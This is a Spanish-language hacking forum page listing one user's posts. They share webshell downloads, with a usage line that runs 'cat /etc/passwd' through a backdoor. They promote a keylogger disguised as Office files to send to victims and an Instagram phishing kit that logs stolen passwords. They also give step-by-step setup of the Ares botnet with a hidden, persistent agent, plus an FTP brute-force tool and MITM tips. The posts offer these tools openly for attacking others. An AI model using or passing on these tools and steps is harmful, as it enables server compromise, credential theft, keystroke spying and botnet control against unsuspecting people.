elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Java [Guía] Patrones de diseño - Parte 1


  Mostrar Mensajes
Páginas: [1] 2
1  Programación / Desarrollo Web / WEBSHELLS | PHP | PACK en: 20 Marzo 2017, 19:42
Queria compartir estas webshells escritas en PHP

DOWNLOAD:C37 WEBSHELL


DOWNLOAD:BY-PASS WEBSHELL



DOWNLOAD: AK-74 SECURITY TEAM WEBSHELL


DOWNLOAD: PREDATOR WEBSHELL


DOWNLOAD: Dhanush
[/align]
USERNAME AND PASSWORD FROM PANEL: Dhanush

DOWNLOAD:SHANKAR WEBSHELL


DOWNLOAD:SIMPLE BACKDOOR

USAGE: simple-backdoor.php?cmd=cat+/etc/passwd

DOWNLOAD:C99 WEBSHELL

Web shell recommended :)

DOWNLOAD:LOSDC WEBSHELL

Web shell recommended :)

DOWNLOAD: PRIVATE SHELL

Web shell recommended :)

DOWNLOAD:SST SHELLER WEBSHELL


Espero que os puedan servir
Un saludo gente :)

MOD: Imagenes adaptadas a lo permitido. Links corregidos.
2  Seguridad Informática / Hacking Avanzado / BeeLogger|KEYLOGGER|PYTHON| en: 20 Marzo 2017, 19:27
Buenas gente queria compartir este keylogger escrito en python, es un keylogger muy sencillito, solo captura lo que la victima teclee, no capturara informacion ni sobre el ordenador ni sobre los navegadores ni nada, tan solo lo que tecleamos :)


Download: BeeLogger


Con la opcion "K" procederemos a crear el keylogger, basicamente podemos elegir que tipo sera,es decir, si nuestro keylogger simulara ser un archivo excel,un archivo en blanco, una presentacion power point etc..





solo se lo tendremos que enviar a la victima



Una vez que la victima lo ejecute,recibiremos los logs despues de pasar 120 segundos o cada 50 caracteres que escriba la victima, recomiendo probarlo :)

Un saludo chicos :)

MOD: Imagen adaptada a lo permitido. Link corregido.
3  Seguridad Informática / Hacking Avanzado / Re: Cain y Abel No puedo instalar en: 20 Marzo 2017, 19:17
Estimados estoy intentando instalar el software Cain y Abel, ya lo descargue pero cuando lo eejecuto me sale el mensaje Could not Initializa Installation. File size expect=8244106, size returned=3916138.
Tengo Windows 7 Professional.
Ya instale como administrador del equipo y con todas las formas de compatibilidad que existen y sigo teniendo ese error.
Muchas gracias por las respuestas
El programa lo baje de la página Oficial

[MOD] No está permitido duplicar post simultaneamente en dos subforos, el otro ha sido eliminado.


Olvida Cain, si quieres realizar ataques MITM, DNS spoofing y demas ataque en LAN, te recomiendo que utilizas bettercap :) un saludo
4  Seguridad Informática / Hacking Avanzado / PHISHING | INSTAGRAM | PACK en: 20 Marzo 2017, 19:16
Buenas a todos, os traigo un phishing de instagram que moten hace tiempo,es sencillito,modificamos los valores del formulario del index de instagram,con nuestro script el cual se encargara de enviar los datos a un fichero txt,el script "reenvio.php" lo puedes utilizar para otros phishings si sabes como programarlo bien :)

La carpeta tiene 3 ficheros

Index.html (Instagram.html,esta pagina simula instagram)

Reenvio.php (Este script sera el encargado de enviar los datos introducidos en el login y el password)


Passwords.txt (Aqui seran recogidas las credenciales)


ESPERO QUE OS PUEDA SERVIR Y CONSEGUIR COMO FUNCIONA EL PHISHING :) NO SOLO MEDIANTE TOOLS AUTOMATIZADAS :)
UN SALUDO Y RECORDAD....no seais malos :)

DOWNLOAD: PHISHING PACK

MOD: Imagenes adaptadas a lo permitido. Link referido corregido.
5  Seguridad Informática / Hacking Avanzado / Re: ¿El SslStrip sigue funcionando? en: 14 Enero 2017, 12:21
bettercap y mitm-framework yo creo que son los dos mejores
6  Seguridad Informática / Análisis y Diseño de Malware / Ares-Botnet en python en: 30 Diciembre 2016, 00:48
Buenas gente os queria compartir aqui al amigo Ares :)

Descripcion

Ares es una herramienta de acceso remoto compuesta por un panel de control donde podremos interaccionar con los bots.
El cliente es un programa escrito en python el cual puede ser compilado como un ejecutable win32 usando PyInstaller.

Instalacion

Código:
git clone https://github.com/sweetsoftware/Ares
Una vez descargado el repositorio pasaremos a instalar las dependecias
Citar
pip install pythoncom
pip install pyhook
pip install PIL
pip install requests

A continuacion configuraremos el agente de la manera que queramos, settings.py
Nos dirigimos a la ruta Ares/agent/python/settings.py

configurando

Este fichero contiene lo siguiente:

-SERVER_URL = URL del servidor http
-BOT_ID = el nombre (singular) del bot
-DEBUG =  imprimir mensajes de depuración en la salida estándar
-Idle_time = tiempo de inactividad antes de entrar en el modo de espera.
-REQUEST_INTERVAL = intervalo entre cada consulta a la CNC cuando se activa
-PAUSE_AT_START = tiempo de espera antes de contactar con el servidor cuando se inicie (en segundos)
-AUTO_PERSIST = por defecto el agente es persistente

fichero de configuracion del server

Una vez todo en orden pasaremos a instalar el server, primero debemos crear la base de datos SQLite

Código:
cd server
python db_init.py

Si no esta instalado el paquete cherrypy deberemos instalarlo
Código:
pip install cherrypy
Bien, a continuacion iniciaremos el server, python server.py
Por defecto el servidor escucha en http://localhost:8080

Por ultimo utlizaremos PyInstaller para compilar el agente en un unico archivo EXE:

Código:
cd agent
PyInstaller --onefile --noconsole agent.py

Recuerden que deberemos iniciar el server y la bbdd antes de lanzar el script.
Aqui deberemos establecer un pass para el CP :)


Mediante el fichero agent.py conseguiremos el bot, yo lo que he hecho ha sido ejecutarlo desde la consola

Panel de Control

Nos da una shell, no es muy molona pero bueno :(




Un saludo  :)



7  Seguridad Informática / Hacking Avanzado / FTP Password Recovery en: 25 Diciembre 2016, 12:42
Buenas gente os queria compartir esta herramienta llamada FTP Password Recovery.

Descripcion

FTP Password Recovery es una herramienta en línea de comandos libre para encontrar la contraseña perdida u olvidada FTP para cualquier servidor FTP. (vamos para realizar ataques de FB)
Detecta automáticamente si el servidor FTP de destino permite que cualquier Anónimo (sin contraseña). En caso de que el servidor FTP se ese ejecutando en un puerto diferente que no sea el puerto 21, entonces se puede especificar fácilmente el mismo en la herramienta junto con la dirección IP del servidor. 

Caracteristicas

-Herramienta gratuita para recuperar la contraseña perdida u olvidada FTP (para realizar ataques FB)
-Tiene una opción para especificar el puerto FTP no estándar
-Detecta automáticamente cualquier usuario anónimo
-Incluye un diccionario de las contraseñas que tienen los FTP mas comunes
-Copia el recuperado contraseña FTP al portapapeles
-Incluye instalador para la instalación y desinstalación local

Instalacion

-Descargaremos la herramienta aqui (abajo Download FTP Password Recovery)
-Una vez que tengamos descargado el zip nos dirigimos a la carpeta y ejecutamos en la consola Setup_FTPPaswordRecovery.exe , se nos abrira el instalador de la herramienta, tan solo tendremos que seleccionar la ruta de donde la queremos instalar y listo

Uso

Es muy facil de usar, con la opcion:
-i elegiremos la IP
-p especificaremos el puerto
-u el usuario
-f la ruta de nuestro diccionario

probando la herramienta en un ftp mio

resultado

Espero que os haya gustado

Un saludo biaaachees :)

8  Foros Generales / Foro Libre / Re: Filosifa Hacker desde la opinion de un user(recomendable) en: 23 Noviembre 2016, 20:38
estoy totalmente de acuerdo para mi un ejemplo de cracker es quien consigue saltarse por ejemplo el codigo de una lincencia mediante la ingenieria inversa,y obviamente entendiendo todo lo que hace,quizas se haya expresado mal ahi,pero el resto de lo que dice yo estoy de acuerdo con lo que dice
9  Seguridad Informática / Seguridad / Re: Ayuda con nmap! en: 23 Noviembre 2016, 18:38
Yo te recomiendo que hagas primero un ip route obtendras las red por ejemplo 192.168.4.0/24...luego tira nmap -sV -A 192.168.4.0/24....y mira a ver si la cosa cambia :)
10  Foros Generales / Foro Libre / Re: Filosifa Hacker desde la opinion de un user(recomendable) en: 23 Noviembre 2016, 17:09
Deberías colocar la fuente de donde sacaste la info.

Saludos!

Modificado :)
Páginas: [1] 2
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines